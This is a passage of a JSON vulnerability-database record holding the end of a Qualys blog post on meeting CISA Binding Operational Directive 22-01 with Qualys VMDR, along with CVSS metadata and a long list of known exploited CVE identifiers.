vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization get there. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors, such as the Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help an organization of any size efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}